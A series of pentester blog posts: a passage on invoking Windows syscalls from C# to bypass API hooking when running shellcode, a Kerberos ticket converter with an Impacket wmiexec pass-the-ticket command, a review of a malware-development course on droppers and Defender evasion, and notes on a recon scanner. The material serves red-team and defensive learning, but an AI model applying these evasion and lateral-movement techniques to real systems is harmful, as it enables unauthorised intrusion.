Lastly, I needed to find documentation for NtWaitForSingleObject, which as you might guess, is the native API called by WaitForSingleObject. You’ll notice a theme where many native API calls are prefaced with “Nt”, which makes mapping them from Win32 calls easier. You may also see the prefix “Zw”, which is also a native API call, but normally called from the kernel. These are sometimes identical, which you will see if you do x ntdll!ZwWaitForSingleObject and x ntdll!NtWaitForSingleObject in WinDbg. Again we get lucky with this API, as ZwWaitForSingleObject is documented on MSDN.

I want to point out a few other good sources of information for mapping Win32 to native API calls. First is the source code for ReactOS, which is an open source reimplementation of Windows. The Github mirror of their codebase has lots of syscalls you can search for. Next is SysWhispers, by jthuraisamy. It’s a project designed to help you find and implement syscalls. Really good stuff here. Lastly, the tool API Monitor. You can run a process and watch what APIs are called, their arguments, and a whole lot more. I didn’t use this a ton, as I only needed 3 syscalls and it was faster to find existing documentation, but I can see how useful this tool would be in larger projects. I believe ProcMon from Sysinternals has similar functionality, but I didn’t test it out much.

Ok, so we have our Win32 APIs mapped to our syscalls. Let’s write some C#!

But these docs are all for C/C++! And isn’t that assembly over there…

Wait a minute, these docs all have C/C++ implementations. How do we translate them into C#? The answer is marshaling. This is the essence of what P/Invoke does. Marshaling is a way of making use of unmanaged code, e.g. C/C++, and using in a managed context, that is, in C#. This is easily done for Win32 APIs via P/Invoke. Just import the DLL, specify the function definition with the help of pinvoke.net, and you’re off to the races. You can see this in the demo code of Win32Injector. But since syscalls are undocumented, Microsoft does not provide such an easy way to interface with them. But it is indeed possible, through the magic of delegates. Jack Halon covers delegates really well here and here, so I won’t go too in depth in this post. I would suggest reading those posts to get a good handle on them, and the process of using syscalls in general. But for completeness, delegates are essentially function pointers, which allow us to pass functions as parameters to other functions. The way we use them here is to define a delegate whose return type and function signature matches that of the syscall we want to use. We use marshaling to make sure the C/C++ data types are compatible with C#, define a function that implements the syscall, including all of its parameters and return type, and there you have it!

Not quite. We can’t actually call a native API, since the only implementation of it we have is in assembly! We know its function definition and parameters, but we can’t actually call it directly the same way we do a Win32 API. The assembly will work just fine for us though. Once again, it’s rather simple to execute assembly in C/C++, but C# is a little harder. Luckily we have a way to do it, and we already have the assembly from our WinDbg adventures. And don’t worry, you don’t really need to know assembly to make use of syscalls. Here is the assembly for the NtAllocateVirtualMemory syscall:

NtAllocateVirtualMemory Assembly

As you can see from the comments, we’re setting up some arguments on the stack, moving our syscall number into the eax register, and using the magic syscall operator. At a low enough level, this is just a function call. And remember how delegates are just function pointers? Hopefully it’s starting to make sense how this is fitting together. We need to get a function pointer that points to this assembly, along with some arguments in a C/C++ compatible format, in order to call a native API.

Putting it all together

So we’re almost done now. We have our syscalls, their numbers, the assembly to call them, and a way to call them in delegates. Let’s see how it actually looks in C#:

NtAllocateVirtualMemory Code

Starting from the top, we can see the C/C++ definition of NtAllocateVirtualMemory, as well as the assembly for the syscall itself. Starting at line 38, we have the C# definition of NtAllocateVirtualMemory. Note that it can take some trial and error to get each type in C# to match up with the unmanaged type. We create a pointer to our assembly inside an unsafe block. This allows us to perform operations in C#, like operate on raw memory, that are normally not safe in managed code. We also use the fixed keyword to make sure the C# garbage collector does not inadvertently move our memory around and change our pointers. Once we have a raw pointer to the memory location of our shellcode, we need to change its memory protection to executable so it can be run directly, as it will be a function pointer and not just data. Note that I am using the Win32 API VirtualProtectEx to change the memory protection. I’m not aware of a way to do this via syscall, as it’s kind of a chicken and the egg problem of getting the memory executable in order to run a syscall. If anyone knows how to do this in C#, please reach out! Another thing to note here is that setting memory to RWX is generally somewhat suspicious, but as this is a POC, I’m not too worried about that at this point. We’re concerned with hooking right now, not memory scanning!

Now comes the magic. This is the struct where our delegates are declared:

Delegates Struct

Note that a delegate definition is just a function signature and return type. The implementation is up to us, as long as it matches the delegate definition, and it’s what we’re implementing here in the C# NtAllocateVirtualMemory function. At line 65 above, we create a delegate named assembledFunction, which takes advantage of the special marshaling function Marshal.GetDelegateForFunctionPointer. This method allows us to get a delegate from a function pointer. In this case, our function pointer is the pointer to the syscall assembly called memoryAddress. assembledFunction is now a function pointer to an assembly language function, which means we’re now able to execute our syscall! We can call assembledFunction delegate like any normal function, complete with arguments, and we will get the results of the NtAllocateVirtualMemory syscall. So in our return statement we call assembledFunction with the arguments that were passed in and return the result. Let’s look at where we actually call this function in Program.cs:

Calling NtAllocateMemory

Here you can see we make a call to NtAllocateMemory instead of the Win32 API VirtualAlloc that Win32Injector uses. We setup the function call with all the needed arguments (lines 43-48) and make the call to NtAllocateMemory. This returns a block of memory for our shellcode, just like VirtualAlloc would!

The remaining steps are similar:

Remaining Syscalls

We copy our shellcode into our newly-allocated memory, and then create a thread within our current process pointing to that memory via another syscall, NtCreateThreadEx, in place of CreateThread. Finally, we start the thread with a call to the syscall NtWaitForSingleObject, instead of WaitForSingleObject. Here’s the final result:

Hello World Shellcode

Hello world via syscall! Assuming this was some sort of payload running on a system with API hooking enabled, we would have bypassed it and successfully run our payload.

A note on native code

Some key parts of this puzzle I’ve not mentioned yet are all of the native structs, enumerations, and definitions needed for the syscalls to function properly. If you look at the screenshots above, you will see types that don’t have implementations in C#, like the NTSTATUS return type for all the syscalls, or the AllocationType and ACCESS_MASK bitmasks. These types are normally declared in various Windows headers and DLLs, but to use syscalls we need to implement them ourselves. The process I followed to find them was to look for any non-simple type and try to find a definition for it. Pinvoke.net was massively helpful for this task. Between it and other resources like MSDN and the ReactOS source code, I was able to find and add everything I needed. You can find that code in the Native.cs class of the solution here.

Wrapup

Syscalls are fun! It’s not every day you get to combine 3 different languages, managed and unmanaged code, and several levels of Windows APIs in one small program. That said, there are some clear difficulties with syscalls. They require a fair bit of boilerplate code to use, and that boilerplate is scattered all around for you to find like a little undocumented treasure hunt. Debugging can also be tricky with the transition between managed and unmanaged code. Finally, syscall numbers change frequently and have to be customized for the platform you’re targeting. D/Invoke seems to handle several of these issues rather elegantly, so I’m excited to dig into those more soon.

Rubeus to Ccache

17 May 2020 at 15:20

Rubeus to Ccache

I wrote a new little tool called RubeusToCcache recently to handle a use case I come across often: converting the Rubeus output of Base64-encoded Kerberos tickets into .ccache files for use with Impacket.

Background

If you’ve done any network penetration testing, red teaming, or Hack The Box/CTFs, you’ve probably come across Rubeus. It’s a fantastic tool for all things Kerebos, especially when it comes to tickets and Pass The Ticket/Overpass The Hash attacks. One of the most commonly used features of Rubeus is the ability to request/dump TGTs and use them in different contexts in Rubeus or with other tools. Normally Rubeus outputs the tickets in Base64-encoded .kirbi format, .kirbi being the type of file commonly used by Mimikatz. The Base64 encoding make it very easy to copy and paste and generally make use of the TGT in different ways.

You can also use acquired tickets with another excellent toolset, Impacket. Many of the Impacket tools can use Kerberos authentication via a TGT, which is incredibly useful in a lot of different contexts, such as pivoting through a compromised host so you can Stay Off the Land. Only one problem: Impacket tools use the .ccache file format to represent Kerberos tickets. Not to worry though, because Zer1t0 wrote ticket_converter.py (included with Impacket), which allows you to convert .kirbi files directly into .ccache files. Problem solved, right?

Rubeus To Ccache

Mostly solved, because there’s still the fact that Rubeus spits out .kirbi files Base64 encoded. Is it hard or time-consuming to do a simple little [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($base64RubeusTGT)) to get a .kirbi and then use ticket_converter.py? Not at all, but it’s still an extra step that gets repeated over and over, making it ripe for a little automation. Hence Rubeus to Ccache.

You pass it the Base64-encoded blob Rubeus gives you, along with a file name for a .kirbi file and a .ccache file, and you get a fresh ticket in both formats, ready for Impacket. To use the .ccache file, make sure to set the appropriate environment variable: export KRB5CCNAME=shiny_new_ticket.ccache. Then you can use most Impacket tools like this: wmiexec.py domain/[email protected] -k -no-pass, where the -k flag indicates the use of Kerberos tickets for authentication.

Usage

╦═╗┬ ┬┌┐ ┌─┐┬ ┬┌─┐  ┌┬┐┌─┐  ╔═╗┌─┐┌─┐┌─┐┬ ┬┌─┐
╠╦╝│ │├┴┐├┤ │ │└─┐   │ │ │  ║  │  ├─┤│  ├─┤├┤
╩╚═└─┘└─┘└─┘└─┘└─┘   ┴ └─┘  ╚═╝└─┘┴ ┴└─┘┴ ┴└─┘
              By Solomon Sklash
          github.com/SolomonSklash
   Inspired by Zer1t0's ticket_converter.py

usage: rubeustoccache.py [-h] base64_input kirbi ccache

positional arguments:
  base64_input  The Base64-encoded .kirbi, sucha as from Rubeus.
  kirbi         The name of the output file for the decoded .kirbi file.
  ccache        The name of the output file for the ccache file.

optional arguments:
  -h, --help    show this help message and exit

Thanks

Thanks to Zer1t0 and the Impacket project for doing most of the havy lifting.

A Review of the Sektor7 RED TEAM Operator: Malware Development Essentials Course

24 March 2020 at 15:20

A Review of the Sektor7 RED TEAM Operator: Malware Development Essentials Course

Introduction

I recently discovered the Sektor7 RED TEAM Operator: Malware Development Essentials course on 0x00sec and it instantly grabbed my interest. Lately I’ve been working on improving my programming skills, especially in C, on Windows, and in the context of red teaming. This course checked all those boxes, and was on sale for $95 to boot. So I broke out the credit card and purchased the course.

Custom code can be a huge benefit during pentesting and red team operations, and I’ve been trying to level up in that area. I’m a pentester by trade, with a little red teaming thrown in, so this course was right in my wheelhouse. My C is slightly rusty, not having done much with it since college, and almost exclusively on Linux rather than Windows. I wasn’t sure how prepared I would be for the course, but I was willing to try harder and do as much research as I needed to get through it.

Course Overview

The course description reads like this:

It will teach you how to develop your own custom malware for latest Microsoft Windows 10. And by custom malware we mean building a dropper for any payload you want (Metasploit meterpreter, Empire or Cobalt Strike beacons, etc.), injecting your shellcodes into remote processes, creating trojan horses (backdooring existing software) and bypassing Windows Defender AV.

It’s aimed at pentesters, red teamers, and blue teamers wanting to learn the details of offensive malware. It covers a range of topics aimed at developing and delivering a payload via a dropper file, using a variety of mechanisms to encrypt, encode, or obfuscate different elements of the executable. From the course page the topics include:

  • What is malware development
  • What is PE file structure
  • Where to store your payload inside PE
  • How to encode and encrypt payloads
  • How and why obfuscate function calls
  • How to backdoor programs
  • How to inject your code into remote processes

RTO: Malware Development Essentials covers the above with 9 different modules, starting with the basics of the PE file structure, ending with combining all the techniques taught to create a dropper executable that evades Windows Defender while injecting a shellcode payload into another process.

The course is delivered via a content platform called Podia, which allows streaming of the course videos and access to code samples and the included pre-configured Windows virtual machine for compiling and testing code. Podia worked quite well, and the provided code was clear, comprehensive, well-commented, and designed to be reusable later to create your own executables.

Module 1: Intro and Setup

The intro and setup module covers a quick into to the course and getting access to the excellent sample code and a virtual machine OVA image that contains a development environment, debugger, and tools like PEBear. I really like that the VM was provided, as it made jumping in and following along effortless, as well as saving time creating a development environment.

Module 2: Portable Executable

This module covers the Portable Executable (PE) format, how it is structured, and where things like code and data reside within it. It introduces PEBear, a tool for exploring PE files I’d not used before. It also covers the differences between executables and DLLs on Windows.

Module 3: Droppers

The dropper module covers how and where to store payload shellcode within a PE, using the .text, .data, and .rsrc sections. It also covers including external resources and compiling them into the final .exe.

Module 4: Obfuscation and Hiding

Obfuscation and hiding was one of my favorite modules. Anyone that has had their shellcode or implants caught will appreciate knowing how to use AES and XOR to encrypt payloads, and how to dynamically decrypt them at runtime to prevent static analysis. I also learned a lot about Windows and the Windows API through the sections on dynamically resolving functions and function call obfuscation.

Module 5: Backdoors and Trojans

This section covered code caves, hiding data within a PE, and how to backdoor an existing executable with a payload. x64dbg debugger is used extensively to examine a binary, find space for a payload, and ensure that the existing binary still functions normally. Already knowing assembly helped me here, but it’s explained well enough for those with little to no assembly knowledge to follow along.

Module 6: Code Injection

I learned a ton from this section, and it really clarified my knowledge of process injection, including within a process, between processes, and using a DLL. VirtualAllocEx, WriteProcessMemory, and CreateRemoteThread are more than just some function names involving process injection to me now.

Module 7: Extras

This module covered the differences between GUI and console programs on Windows, and how to ensure the dreaded black console window does not appear when your payload is executed.

Module 8: Combined Project

This was the culmination of the course, where you are walked through combining all the individual techniques and tools you learned throughout the course into a single executable. I suggest watching it and then doing it yourself independently to really internalize the material.

Module 9: Assignment

The last module is an assignment, which asks you to take what you’ve learned in the combined project and more fully implement some of the techniques, as well as providing some suggestions for real-world applications of the course content you can try by yourself.

Takeaways

I learned a heck of a lot from this course. It was not particularly long, but it covered the topics thoroughly and gave me a good base to build from. I can’t remember a course where I learned so much in so little time. Not only did I learn what was intended by the course, but there were a lot of ancillary things I picked up along the way that weren’t explicitly covered.

C on Windows

I found the course to be a good introduction to C on Windows, assuming you are already familiar with C. It’s not a beginning C programming course by any means. Most of my experience with C has been on Linux with gcc, and the course provided practical examples of how to write C on Windows, how to use MSDN effectively, how to structure programs, and how to interact with DLLs. I was familiar with many of the topics at a high level, but there’s no substitute for digging in and writing code.

Intro to the Windows API

I also learned a great deal on how the Windows API works and how to interact with it. The section on resolving functions manually was especially good. I have a much stronger grasp of how Windows presents different functionalities, and how to lookup functions and APIs on MSDN to incorporate them into my own code.

Making Windows Concepts Concrete

As mentioned above, there were a lot of areas I knew about at a high level, like process injection, DLLs, the Import Address Table, even some Windows APIs like WriteProcessMemory and CreateRemoteThread. But once I looked up their function signatures on MSDN, called them myself, created my own DLLs, and obfuscated the IAT, I had a much more concrete understanding of each topic, and I feel much more prepared to write my own tools in the future using what I’ve learned.

A Framework For Building Your Own Payloads

The way the course built from small functions and examples, all meant to be reused and built upon, really made the course worthwhile and feel like an investment I could take advantage of later in my own tools. I’ve already managed to craft a dropper that executes a staged Cobalt Strike payload that evades Windows Defender. How’s that for a practical hands-on course?

No Certification Exam

The course is not preparation for or in any way associated with a certification exam, which in this case I think is a good thing. The course presents fundamental knowledge that is immensely useful in offensive security, and I think it’s best learned for its own sake rather than to add more letters after your name. I like certifications in general and have several, but I found myself not worried about covering the material for an exam and enjoyed learning the material and thinking of practical applications of it at work and in CTFs, Hack The Box, etc. instead. It’s a nice feeling.

Conclusion

I loved this course, and reenz0h is a phenomenal instructor. If it’s not been obvious so far, I’ve gained a lot of fascinating and practical knowledge that will be useful far into the future. My recommendation: take this course if you can. It’s affordable, not an excessive time commitment, and worth every second and penny you spend on it. And just in case my enthusiasm comes across as excessive or shilling, I have no association with Sektor7, their employees, or the authors of the course. Just a happy pentester with some new skills.

Updates to Chomp Scan

3 March 2019 at 16:20

Updates To Chomp Scan

I’ve been pretty busy working on updates to Chomp Scan. Currently it is at version 4.1. I’ve added new tools, an install script, a new scanning phase, a CLI mode, plus bug fixes and more.

What’s Changed

Quite a bit! Here’s a list:

New CLI

I’ve added a fully-functional CLI interface to Chomp Scan. You can select your scanning phases, wordlists, output directory, and more. See -h for help and the full range of options and flags.

Install Script

I’ve created an installation script that will install all dependencies and install Golang. It supports Debian 9, Ubuntu 18.04, and Kali. Simply run the installer.sh script, source ~/.profile, and Chomp Scan is ready to run.

New Scanning Phase

I’ve added a new scanning phase: Information Gathering. Like the others, it is optional, consisting of subjack, bfac, whatweb, wafw00f, and nikto.

New Tools: dirsearch and wafw00f

Upon request, I’ve added dirsearch to the Content Discovery phase. Currently it uses php, asp, and aspx as file extensions. I’ve also added wafw00f to the Information Gathering phase.

Output Files

There are now three total output files that result from Chomp Scan. They are all_discovered_ips.txt, all_discovered_domains.txt, and all_resolved_domains.txt. The first two are simply lists of all the unique IPs and domains that were found as a result of all the tools that Chomp Scan runs. Not all maybe relevant, as some domains may not resolve, some IPs may point to CDNs or 3rd parties, etc. They are included for completeness, and the domains especially are useful for keeping an eye on in case they become resolvable in the future.

The third output file, all_resolved_domains.txt, is new, and the most important. It contains all the domains that resolve to an IP address, courtesy of massdns. This list is now passed to the Content Discovery and Information Gathering phases. As the file only contains valid resolvable domains, false positive are reduced and scan time is shortened.

Introducing Chomp Scan

22 February 2019 at 16:20

Introducing Chomp Scan

Today I am introducing Chomp Scan, a pipeline of tools used to run various reconnaissance tools helpful for bug bounty hunting and penetration testing.

Why Chomp Scan?

The more I’ve gotten into bug bounty hunting, the more I’ve found times where managing all the different scanning tools, their flags, wordlists, and output directories becomes a chore. Recon is a vital aspect of bug hunting and penetration testing, but it’s also largely repetitive and tool-based, which makes it ripe for automation. I found I was contantly running the same tools with similar flags over and over, and frequently in the same order. That’s where Chomp Scan comes in.

I’ve written it so that all tool output is contained in a time-stamped directory, based on the target domain. This way it’s easy to go back and find certain outputs or grep for specific strings. As a pentester or bounty hunter, familiarity with your tools is essential, so I include all the flags, arguments, parameters, and wordlists that are being used with each command. If you need to make a change or tweak a flag, the code is (hopefully) commented well enough to make it easy to do.

A neat feature I’ve included is a list of words called interesting.txt. It contains a lot of words and subdomain fragments that are likely to be of interest to a pentester or bug hunter, such as test, dev, uat, internal, etc. Whenever a domain is discovered that contains one of these interesting words, it is flagged, displayed in the console, and added to a list. That list can then be focused on by later scanning stages, allowing you to identify and spend your valuable time on the most high value targets. Of course interesting.txt is customizable, so if you have a specific keyword or subdomain you’re looking for, you can add it.

Scanning Phases

Chomp Scan has 4 different phases of scanning. Each utilizes one or more tools, and can optionally be skipped for a shorter total scan runtime.

  • Subdomain Discovery (3 different sized wordlists)
  • Screenshots
  • Port Scanning
  • Content Discovery (4 different sized wordlists)

In The Future

Chomp Scan is still in active development, as I use it myself for bug hunting, so I intend to continue adding new features and tools as I come across them. New tool suggestions, feedback, and pull requests are all welcomed. Here is a short list of potential additions I’m considering:

  • A non-interactive mode, where certain defaults are selected so the scan can be run and forget
  • Adding a config file, for more granular customization of tools and parameters
  • A possible Python re-write, with a pure CLI mode (and maybe a Go re-write after that!)
  • The generation of an HTML report, similar to what aquatone provides

Tools

Chomp Scan depends on the following list of tools. Several are available in the default Kali Linux repos, and most are otherwise simple to install, especially if you already have a Go installation.

How To Get It

Visit the Chomp Scan Github repository for download and installation instructions.

alt text

alt text

alt text

alt text

❌